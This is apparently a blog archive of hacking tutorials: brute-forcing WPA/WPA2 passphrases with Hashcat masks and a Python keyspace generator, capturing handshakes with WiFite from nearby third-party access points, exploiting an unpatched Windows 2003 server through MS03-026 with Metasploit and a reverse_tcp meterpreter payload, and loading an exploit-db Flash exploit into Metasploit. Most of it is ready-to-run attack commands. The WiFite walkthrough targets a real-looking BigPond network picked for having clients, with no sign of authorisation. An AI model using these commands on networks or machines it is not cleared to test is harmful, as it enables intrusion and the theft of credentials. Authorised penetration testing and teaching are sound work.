Category Archives: HACKING



Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords)

cudaHashcat, oclHashcat and Hashcat on Kali Linux have built-in support for cracking WPA/WPA2 handshake capture files (.cap). Note that this is not decryption: the tool derives keys from candidate passphrases and checks each one against the captured handshake. The only constraint is that the .cap file must first be converted to the .hccap format, which is rather easy.

Important Note: Many users try to capture with network cards that are not supported. You should purchase a card that supports Kali Linux, including packet injection and monitor mode. A list can be found in 802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card; otherwise you'll just be wasting time and effort on something that won't do the job.

My Setup

I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for most of the exercise. In this post, I will show How to crack WPA/WPA2 handshake file (.cap files) with cudaHashcat or oclHashcat or Hashcat on Kali Linux.

I will use the cudahashcat command because I am using an NVIDIA GPU. If you're using an AMD GPU, then I guess you'll be using oclHashcat. Let me know if this assumption is incorrect.

Why use Hashcat to crack WPA/WPA2 handshake file?

Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files?

  1. Because we can?
  2. Because Hashcat allows us to use customized attacks with predefined rules and Masks.

Now this doesn’t explain much and reading HASHCAT Wiki will take forever to explain on how to do it. I’ll just give some examples to clear it up.

Hashcat lets you build masks for attacking a WPA/WPA2 handshake file from the following built-in charsets. ?a is the union of the other four, so it is the largest (and slowest) choice.

Built-in charsets

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~   (the first character is a space)

?a = ?l?u?d?s

Numbered passwords

So let's say your password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d

What it means is that you're trying to break an 8-digit numeric password like 12345678 or 23456789 or 01567891. You get the idea: the mask covers all 10^8 (100 million) 8-digit strings.

Letter passwords – All uppercase

If your password is all letters in CAPS, such as ABCDEFGH or LKHJHIOP or ZBTGYHQS etc., then you can use the following MASK:

?u?u?u?u?u?u?u?u

It will try all 8-letter passwords in CAPS (26^8, about 209 billion candidates).

Letter passwords – All lowercase

If your password is all letters in lowercase, such as abcdefgh or dfghpoiu or bnmiopty etc., then you can use the following MASK:

?l?l?l?l?l?l?l?l

It will try all 8-letter passwords in lowercase. I hope you now see where I am going with this.

Passwords – Lowercase letters and numbers

If you know your password mixes lowercase letters and numbers, like a1b2c3d4 or p9o8i7u6 or n4j2k5l6 etc., then define a custom charset (-1) that contains both and use it in the MASK:

-1 ?l?d ?1?1?1?1?1?1?1?1
Passwords – Uppercase letters and numbers

If you know your password mixes uppercase letters and numbers, like A1B2C3D4 or P9O8I7U6 or N4J2K5L6 etc., then you can use the following custom charset and MASK:

-1 ?u?d ?1?1?1?1?1?1?1?1
Passwords – Mixed matched with uppercase, lowercase, number and special characters.

If your password is completely random, then you can just use a MASK like the following:

?a?a?a?a?a?a?a?a

Note: ?a represents any printable ASCII character (lowercase, uppercase, digits and specials), so this is the largest 8-character keyspace: 95^8, roughly 6.6 quadrillion candidates. I hope you're getting the idea.

If you are absolutely not sure, you can just use one of the predefined .hcmask files and leave it running. But yeah, come back in a million years for a really long password. WPA's key derivation (4096 rounds of PBKDF2-HMAC-SHA1 per candidate) keeps the rate low even on a GPU, so anything close to ?a^8 is out of reach; a dictionary attack, ideally combined with rules, has far more chance of success in that scenario.

Passwords – when you know a few characters

If you somehow know a few characters of the password, things get a lot faster: every known position removes a whole factor from the keyspace. Masks let you combine literal characters with charsets. Let's say your 8-character password starts with abc and doesn't contain any special characters. Then you can use a MASK like the following (or put the same line in a .hcmask file):

-1 ?l?u?d abc?1?1?1?1?1

(in .hcmask file syntax: ?l?u?d,abc?1?1?1?1?1)

That leaves 62^5, about 916 million candidates, instead of 62^8 for the whole password, so it will surely break it in time. This is the true power of using cudaHashcat or oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords.

You can narrow it down even further if you know how a person builds their passwords. Some people always use an UPPERCASE letter as the first character, follow it with a few lowercase letters and finish with numbers. For an 8-character password of that shape, your mask will be:

?u?l?l?l?l?d?d?d

This will make cracking significantly faster (26^5 x 10^3, about 12 billion candidates, versus 62^8 for an unstructured mask of the same length). Social engineering is the key here.
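To make the mask arithmetic above concrete, here is an added Python example (not code from this post or from hashcat) that parses masks in hashcat's syntax, including custom charsets given as -1 ... or as the leading comma-separated fields of an .hcmask line, reports the keyspace, generates candidates, and flags masks that can never match a WPA/WPA2 passphrase (which is 8 to 63 characters). The 4,000 candidates per second rate in the demo is an assumed figure for illustration, not a measurement of the GTX 210 used in this post.

```python
"""Keyspace calculator and candidate generator for hashcat-style masks.

Added example; not code from the original post or from hashcat. It implements
the mask grammar the post describes: built-in charsets ?l ?u ?d ?s ?a, literal
characters, and custom charsets ?1..?4 supplied the way hashcat's -1..-4 options
(or the leading comma-separated fields of an .hcmask line) supply them.
"""
import itertools
import string

# hashcat's built-in charsets; ?s is the space plus the 32 ASCII punctuation characters
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def _tokens(spec, custom):
    """Yield the list of characters each token of a mask or charset spec stands for."""
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":                 # "??" is an escaped literal question mark
                yield ["?"]
            elif key in BUILTIN:
                yield list(BUILTIN[key])
            elif key in custom:
                yield custom[key]
            else:
                raise ValueError(f"unknown charset ?{key} in {spec!r}")
            i += 2
        else:
            yield [spec[i]]                # any other character is a literal
            i += 1


def expand_charset(spec, custom):
    """Flatten a custom charset spec such as "?l?d" or "abc?d" into its unique characters."""
    return list(dict.fromkeys(ch for tok in _tokens(spec, custom) for ch in tok))


def parse_mask(mask, custom_specs=()):
    """Return one candidate-character list per password position.
    custom_specs[0] becomes ?1, custom_specs[1] becomes ?2, ... (like -1, -2, ...)."""
    custom = {}
    for n, spec in enumerate(custom_specs, start=1):
        custom[str(n)] = expand_charset(spec, custom)   # later charsets may reuse earlier ones
    return list(_tokens(mask, custom))


def parse_hcmask_line(line):
    """Parse one line of an .hcmask file: "[cs1,[cs2,[cs3,[cs4,]]]]mask".
    (A literal comma inside a field would have to be escaped as "\\,"; not handled here.)"""
    fields = line.strip().split(",")
    return parse_mask(fields[-1], fields[:-1])


def keyspace(positions):
    """Number of candidates the mask generates (product of the per-position charset sizes)."""
    total = 1
    for pos in positions:
        total *= len(pos)
    return total


def candidates(positions):
    """Generate every candidate in plain lexicographic order (hashcat's own order differs
    because it reorders by Markov statistics unless told not to)."""
    for combo in itertools.product(*positions):
        yield "".join(combo)


def wpa_usable(positions):
    """WPA/WPA2 passphrases are 8 to 63 characters; a mask outside that range wastes the run."""
    return 8 <= len(positions) <= 63


def estimate_seconds(positions, rate_per_second):
    """Wall-clock estimate for an exhaustive run at a given candidate rate."""
    return keyspace(positions) / rate_per_second


if __name__ == "__main__":
    # The masks from the post; the 4,000 candidates/s rate is an assumed figure, not a benchmark.
    for spec in ["?d?d?d?d?d?d?d?d", "?u?u?u?u?u?u?u?u", "?l?d,?1?1?1?1?1?1?1?1",
                 "?l?u?d,abc?1?1?1?1?1", "?u?l?l?l?l?d?d?d", "?a?a?a?a?a?a?a?a", "?d?d?d?d"]:
        pos = parse_hcmask_line(spec)
        print(f"{spec:28} keyspace={keyspace(pos):>20,} wpa_usable={wpa_usable(pos)} "
              f"~{estimate_seconds(pos, 4000) / 86400:.1f} days")
    print(list(itertools.islice(candidates(parse_mask("ab?d")), 3)))
```

Run it as is to print the keyspace of each mask from this section; feed `parse_hcmask_line` the lines of one of the files under /usr/share/oclhashcat/masks/ to size a whole mask file before committing a GPU to it.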

That’s enough with MASK’s. Now let’s capture some WPA/WPA2 handshake files.

Capture handshake with WiFite

Why WiFite instead of the other guides that use Aircrack-ng? Because we don't have to type in a whole series of commands.

Type in the following command in your Kali Linux terminal:

wifite --wpa

You could also type in

wifite wpa2

If you want to see everything (WEP, WPA or WPA2), just type the following command. It doesn't make any difference except for a few more minutes of scanning.


Once you type it in, the following is what you'll see.

1 - Wifite - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

So, we can see a bunch of Access Points (APs for short). Always go for the ones with CLIENTS: a handshake is only captured when a client (re)authenticates, so it's just much faster. You can choose all or pick by number. See the screenshot below.

2 - Wifite Screen - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Awesome, we've got a few with clients attached. I will pick 1 and 2 because they have the best signal strength. Try picking the ones with good signal strength. If you pick one with a poor signal, you might be waiting a LONG time before you capture anything, if anything at all.

So I've picked 1 and 2. Press Enter to let WiFite do its magic.

3 - WiFite Choice - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Once you press ENTER, the following is what you will see. I got impatient as choice number 1 wasn't doing anything for a LONG time, so I pressed CTRL+C to quit out of it.

This is actually a great feature of WiFite. It now asks me,

What do you want to do?

  1. [c]ontinue attacking targets
  2. [e]xit completely.

I can type c to continue or e to exit. This is the feature I was talking about. I typed c to continue: it skips choice 1 and starts attacking choice 2. This is a great feature because not all routers, APs or targets respond to the deauthentication the same way. You could of course wait and eventually get a response, but if you're just after ANY AP, it saves time.

4 - WiFite continue - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

And voilà, it took only a few seconds to capture a handshake. This AP had lots of clients, and the handshake is captured as soon as one of them (re)authenticates.

This handshake was saved in /root/hs/BigPond_58-98-35-E9-2B-8D.cap file.

Once the capture is complete and there are no more APs to attack, Wifite just quits and you get your prompt back.

5 - WiFite captured handshake - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Now that we have a capture file with handshake on it, we can do a few things.

Clean up your cap file using wpaclean

Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand.

Here’s how to do it:

To convert your .cap files manually in Kali Linux, use the following command

wpaclean <out.cap> <in.cap>

Please note that wpaclean takes its arguments the other way round from most tools: <out.cap> <in.cap> rather than <in.cap> <out.cap>, which can cause some confusion.

In my case, the command is as follows:

wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap

Convert .cap file to .hccap format

We need to convert this file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux can understand.

To convert it to .hccap format with "aircrack-ng" we use the -J option:

aircrack-ng <out.cap> -J <out.hccap>

Note the -J is a capital J, not a lowercase j. aircrack-ng appends the .hccap extension itself, so give it the output name without the extension.

In my case, the command is as follows:

aircrack-ng hs/out.cap -J hs/out

Caveat for newer tool versions: later aircrack-ng releases dropped the -J option, and newer Hashcat no longer reads .hccap at all. Hashcat 3.40 and later expect the .hccapx format (produced by cap2hccapx from hashcat-utils) for mode 2500, and Hashcat 6.x expects the 22000 format produced by hcxpcapngtool, used with -m 22000; mode 2500 is deprecated there. The attack modes and masks in the rest of this post apply unchanged.

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 1

Cracking WPA/WPA2 handshake with Hashcat

cudaHashcat, oclHashcat and Hashcat on Kali Linux are very flexible, so I'll cover the two most common and basic scenarios:

  1. Dictionary attack
  2. Mask attack

Dictionary attack

Grab some Wordlists, like Rockyou.

Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc.

First we need to find out which hash mode to use for a WPA/WPA2 handshake file. I've covered this at length in the Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux guide. Here's a short rundown:

cudahashcat --help | grep WPA

So it’s 2500.

Now use the following command to start the cracking process:

cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 2

Bingo. I used a common password for this wireless AP, so it took only a few seconds to crack. Depending on your dictionary size, it might take a while.

You should remember that if you're going to use a dictionary attack, Pyrit would be much, much faster than cudaHashcat or oclHashcat or Hashcat. Why are we showing this here? Because we can. 🙂

Another guide explains how this whole Dictionary attack works. I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary related attacks in full length.

Brute-Force Attack

Now this is the main part of this guide: using a brute-force MASK attack.

To crack a WPA/WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command:

cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

Where -m 2500 means we are attacking a WPA/WPA2 handshake file.

-a 3 means we are using the brute-force attack mode (this is the mode that takes a MASK).

capture.hccap = your converted .cap file. We generated it using wpaclean and aircrack-ng.

?d?d?d?d?d?d?d?d = your MASK, where ?d = digit. That means the password is 8 digits, i.e. 78964351 or 12345678 etc. (remember that a WPA passphrase is at least 8 characters, so a shorter mask can never match).

I've created a special MASK file to make things faster. You should create your own MASK file in the same way I explained earlier. I've saved mine as blackmoreops-1.hcmask in Hashcat's masks directory; the full path appears in the command below.


Do the following to see all available default MASK files provided by cudaHashcat or oclHashcat or Hashcat:

ls /usr/share/oclhashcat/masks/

In my case, the command is as follows:

cudahashcat -m 2500 -a 3 /root/hs/out.hccap  /usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 3

Sample .hcmask file

You can check the content of a sample .hcmask file using the following command:

tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 4

Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip.

Location of Cracked passwords

Hashcat or cudaHashcat saves all recovered passwords in a pot file. For these releases it is hashcat.pot in the directory you ran Hashcat, cudaHashcat or oclHashcat from. In my case, I've run all commands from my home directory, which is /root. (Newer Hashcat versions call it hashcat.potfile and keep it in the Hashcat install directory, or in ~/.hashcat/ when installed system-wide; --potfile-path overrides the location.)

cat hashcat.pot

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 5

802.11 Recommended USB Wireless Cards for Kali Linux


This post lists some of the best performing, supported and recommended USB wireless cards for Kali Linux.

There isn't a "best" card. There is whatever is right for YOU.

The following USB wireless cards are known to work with Kali Linux (i.e. monitor mode, packet injection etc.).

*Note* These are not in any type of order *Note*

A common problem with pentest distros such as Kali or BackTrack Linux is users trying to use a card that is not supported or simply has no supported driver. Most of the following cards are priced below 50 USD and save a massive headache: the time goes into actually doing something rather than troubleshooting driver issues, since with each update the makeshift fixes tend to break old drivers and you end up doing the whole thing again and again. The guide above generated a lot of emails and personal requests from users who could not make it work just because their WiFi card wasn't among the recommended wireless cards for Kali Linux.



Rokland N3…b-for-macs-pcs

$32.97 off Rockland



$32.99 off Amazon


TP-Link WN722N…TL-WN722N#spec

$15.18 off Amazon


Linksys WUSB54GC v1

25.00$ off Amazon


5GHz (& 2.4GHz)


Rosewill RNX-N600UBE…ifications.htm

$32.66 off Amazon


Other useful links

As the price will change over time and from country to country, it’s missing on purpose. Places that have been known to stock the mentioned cards:

If you have a different card feel free to share here which will probably help another user someday.

Side Note:

I’ve compiled a small list (These are the only 8 laptops that I could find to match my personal choices) that are Linux compatible and have NVIDIA GeForce Graphics cards. (I’ve tried to avoid AMD/ATI as there’s been some inconsistency lately with their Linux proprietary drivers and heating issues, sorry AMD, take Linux users more seriously next time). NVIDIA seems more stable and gives you more options … Feel free to check this list and add comments about which one you have or prefer…


“No responsibility is taken for the correctness of this information.” == Double check before purchasing.



Or maybe you would like to turn a Kindle device into a portable Kali installation? The possibilities are endless...


How to pentest a Remote PC (Windows 2003 server) with Metasploit - blackMORE Ops

This is a detailed step-by-step guide on how to pentest a remote PC (Windows 2003 server) with Metasploit. I've used BackTrack 5 and Windows 2003 server in a virtual environment. The ease of pentesting is scary, and readers and sysadmins are advised to update their Windows 2003 servers to the latest patch/service pack and use additional antivirus and firewalls to protect them from a similar situation. The author takes no responsibility for how this tutorial is used by readers; it is for educational purposes only.


Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

  1. The msfconsole,
  2. The msfcli interface and
  3. The msfweb interface.

However, the primary and most preferred work area is 'msfconsole'. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

  1. search : Typing the command search along with a keyword lists the exploits whose name or description matches that keyword.
  2. show exploits : Typing the command 'show exploits' lists all the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.
  3. show payloads : With the same 'show' command, we can also list the payloads available. Once an exploit is selected, 'show payloads' lists only the payloads compatible with it.
  4. show options : Typing the command 'show options' shows the options you have set and possibly the ones you have forgotten to set. Each exploit and payload comes with its own options that you can set.
  5. info : If you want specific information on an exploit or payload, use the 'info' command. For example, 'info payload windows/meterpreter/reverse_tcp' or 'info exploit/windows/dcerpc/ms03_026_dcom'.
  6. use : This command tells Metasploit to use the exploit with the specified name.
  7. set RHOST : This command instructs Metasploit to target the specified remote host.
  8. set RPORT : This command sets the port that Metasploit will connect to on the remote host.
  9. set PAYLOAD : This command selects the payload that runs on the target once the exploit succeeds, for example a command shell or a Meterpreter session.
  10. set LPORT : This command sets the port the payload uses on your side. For a reverse payload it is the port your handler listens on (the target connects back to it), so it must be free on your machine and reachable from the target through any firewall in between; for a bind payload it is the port opened on the target. Pick any free port above 1024; if a handler from an earlier run is still bound to it, choose another or kill that job.
  11. exploit : Actually launches the exploit against the target. Another version, rexploit, reloads your exploit code and then executes it. This allows you to try minor changes to your exploit code without restarting the console.
  12. help : The 'help' command gives basic information on all the commands not listed here.

Now that you are ready with all the basic commands you need to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev


The only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server
The output of the nmap scan shows us a range of ports open which can be seen below in Figure 1.

Step 1 – Scan with nmap for open ports - blackMORE Ops

Figure 1

We notice that port 135 (the Microsoft RPC endpoint mapper) is open. So we can look for a Metasploit module targeting that service and gain shell access if this server is vulnerable.

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Step 2 – Open msfconsole - blackMORE Ops

Figure 2

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Step 2 – Open msfconsole-2 - blackMORE Ops

Figure 3

Step 3 – Search RPC exploit in Metasploit

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.
To list all the exploits supported by Metasploit we use the "show exploits" command. This command lists all the currently available exploits; a small portion of the list is shown below in Figure 4.

Step 3 – Search RPC exploit in Metasploit - blackMORE Ops

Figure 4

As you may have noticed, the default installation of Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile, so finding a specific exploit in this huge list by eye would be tedious. A better option is the "search" command in Metasploit, which searches for exploits related to RPC.
In msfconsole type "search dcerpc" to list all the exploits related to the dcerpc keyword, since an exploit against the DCE/RPC service on port 135 is what we need to gain access to the server. The related exploits are presented in the msfconsole window as shown below in Figure 5.

Step 3 – Search RPC exploit in Metasploit-2 - blackMORE Ops

Figure 5

Step 4 – Gather info about target exploit

Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command “info exploit/windows/dcerpc/ms03_026_dcom” which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.

Step 4 – Gather info about target exploit - blackMORE Ops

Figure 6

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Step 5 – Activate exploit - blackMORE Ops

Figure 7

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The "show options" command displays the various parameters required for the exploit to be launched properly. In our case, RPORT is already set to 135 and the only option to be set is RHOST, which is set using "set RHOST <target IP>".
After entering the "set RHOST" command with the target's IP address, "show options" confirms that RHOST is set to it.

Step 6 – Configure exploit - blackMORE Ops

Figure 8

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Step 7 – Set payload for exploit - blackMORE Ops

Figure 9

For our case, we are using the reverse tcp meterpreter which can be set using the command, “set PAYLOAD windows/meterpreter/reverse_tcp” which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using “show options” to make sure all the compulsory sections are properly filled so that the exploit is launched properly

Step 7 – Set payload for exploit-2 - blackMORE Ops

Figure 10

We notice that the LHOST for our payload is not set, so we set it to our local IP (the address the target will connect back to) using the command "set LHOST <our IP>".

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In our case, as shown in the figure below, our selected exploit does not support the check option.

Step 8 – Launch exploit and establish connection - blackMORE Ops

Figure 11

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Step 8 – Launch exploit and establish connection-2 - blackMORE Ops

Figure 12

The above figure shows that the exploit was successfully executed against the remote machine because the DCOM RPC service listening on port 135 was not patched against MS03-026.

This is indicated by change in prompt to “meterpreter >“.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been set up between the victim and our machine, we have a Meterpreter session on the server and can control it from our console.

We can use the help command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below Figure.

Below are the results of some of the meterpreter commands.

Step 9 – Perform an action on pentested server - blackMORE Ops

Figure 13

Step 9 – Perform an action on pentested server-2 - blackMORE Ops

Add new exploits to Metasploit from Exploit-db

All this time you were just using mainstream exploits which were famous but old. They worked well, but only with old unpatched operating systems, not updated ones. Now it's time to move on to the next step. Our poor experience against Windows 8 and Java 7u60 left us shattered, and we realized that fully patched and updated machines with a strong antivirus and firewall can be pretty hard to break into. Now we will move into the world of real pentesting, and the first step is an introduction to exploit-db.


As usual, a few official words from the developers before I express my personal views.

The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. (offensive security)

Some more

The Exploit Database is a CVE-Compatible Database and (where applicable) CVE numbers are assigned to the individual exploit entries in the database. The public database archive does not contain the mapped CVE numbers, but we make them available to our partnering organizations, making links to The Exploit Database entries available within their products.
As many exploit developers lament, it is frequently more difficult to locate a vulnerable application than it is to take a public proof of concept and change it into a working exploit. For this reason, The Exploit Database also hosts the vulnerable application versions whenever possible.
In addition, the team of volunteers that maintain the site also make every effort to verify the submitted exploits and a visual indicator is provided whether or not a successful verification was performed. (Offensive Security)

Now, what exploit-db really is, is nothing more than a database where pentesters who write an exploit for a vulnerability upload its source code for other pentesters to see. It is maintained by Offensive Security (the force behind BackTrack, Kali and Metasploit Unleashed). The site itself is pretty easy to navigate, and you can find all sorts of exploits there. Just finding an exploit, however, is not enough: you need to add it to Metasploit in order to use it.

Adobe Flash Player Shader Buffer Overflow

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8. (rapid7)

Now the site suggests that the exploit can be found here.


But using the command

use exploit/windows/browser/adobe_flash_pixel_bender_bof

shows that the exploit is not in Metasploit yet (chances are good it’s there if you update metasploit regularly or if you are reading this tutorial a long time after it was written. Either ways, the method will not differ even if the exploit is already there, so don’t worry. Also you can use a different exploit as per your liking, and just replace the name wherever you see it being used in commands)

Now, there are two alternatives. First, update the Metasploit framework using

msfupdate

This will update the framework with new modules.

The second alternative is to download the exploit from exploit-db and put it in the ~/.msf4/modules/exploits/<your_folder> directory. Any exploit put there is picked up by Metasploit when it starts and shows up as use exploit/your_folder/exploit_name. While <your_folder> is arbitrary and can be set to any value, it is recommended to mirror the framework's own directory structure: this exploit belongs in ~/.msf4/modules/exploits/windows/browser/. Also, it is mandatory to place exploits in a subdirectory of ~/.msf4/modules/exploits/ or you won't be able to use them. For newbies in Linux, here is a detailed step-by-step guide.

Get the exploit

For example's sake, we'll use the Adobe shader exploit from exploit-db. Click on the Save icon to download the exploit. Save it on your Kali desktop.

.msf4 directory method

Now, if you are not well versed in Linux, you will need help with creating the directory and placing the file there. Although I'm guiding you through it, you should be proficient in Linux usage and able to do basic things like this at least. You can either use the command line to create the directories or do it from the GUI.

Command line method

First, say hi to mkdir

mkdir --help
Usage: mkdir [OPTION]... DIRECTORY...
Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.
  -m, --mode=MODE   set file mode (as in chmod), not a=rwx - umask
  -p, --parents     no error if existing, make parent directories as needed
  -v, --verbose     print a message for each created directory
  -Z, --context=CTX  set the SELinux security context of each created
                      directory to CTX
      --help     display this help and exit
      --version  output version information and exit

First we'll move to the already existing directory (you need to be in root's home directory, /root, for this to work; type just cd if unsure, it will take you there):
root@kali:~# cd .msf4/modules/
To see what the directory has, execute ls. It will return nothing as the directory is empty.

root@kali:~/.msf4/modules# ls
Now we'll use mkdir to create what we need.
root@kali:~/.msf4/modules# mkdir exploits
root@kali:~/.msf4/modules# cd exploits
root@kali:~/.msf4/modules/exploits# mkdir windows
root@kali:~/.msf4/modules/exploits# cd windows
root@kali:~/.msf4/modules/exploits/windows# mkdir browser
If you read the mkdir help text, you might have noticed the -p option. It makes everything much easier. Everything above can be achieved with something as simple as
root@kali:~# mkdir -p ~/.msf4/modules/exploits/windows/browser
Now meet cp
root@kali:~# cp --help
Usage: cp [OPTION]... [-T] SOURCE DEST
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.
Assuming you have the adobe_flash_pixel_bender_bof.rb file on your desktop, use the following commands (the module must land in the browser subdirectory, not one level up in windows/).
root@kali:~# ls
Desktop  app.apk
root@kali:~# cd Desktop
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows/browser
Now check for yourself
root@kali:~/Desktop# cd ~/.msf4/modules/exploits/windows/browser
root@kali:~/.msf4/modules/exploits/windows/browser# ls

GUI Method

Go to Computer -> Filesystem -> Home. You won't see .msf4 there, because the dot prefix marks hidden files; go to View and select "Show hidden files" and it becomes visible.

Now the rest is going to be a piece of cake. Copy the exploit from the desktop, create the directories with the easy right click -> New Folder method, and paste the file where it needs to be. You'll be done. Now restart msfconsole or type reload_all to reload the modules. This adds the module to Metasploit and you can use it as you normally would.

Hack WiFi WPA-2 PSK Capturing the Handshake

WPA password hacking

Okay, so hacking WPA-2 PSK involves 2 main steps-

  1. Getting a handshake (it does not contain the password itself, but a MIC keyed with a key derived from it, which is enough to test guesses against)
  2. Cracking it offline.

Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the wireless network, and the wireless access point. When the client and access point communicate in order to authenticate the client, they perform a 4-way handshake that we can capture. The handshake carries the two nonces and a MIC computed with a key derived from the pre-shared key (PSK), and the PSK is in turn derived from the passphrase and the SSID. There is no way to get the passphrase back out of the MIC directly, which is the whole point of the design. But there is one thing we can do: take a candidate password, run it through the same derivation, compute the MIC over the captured handshake and compare it to the captured one. If the MICs match, we know which plaintext password produced it, so we know the password.

If the process sounds really time consuming to you, that's because it is: every guess costs 4096 iterations of PBKDF2-HMAC-SHA1, so WPA cracking (and hash cracking in general) is a resource intensive and slow process. There are various ways the cracking can be done, but since cracking is the long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I'll face the problems for you). Before that, some optional Wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie, do you?)

The Four-Way Handshake

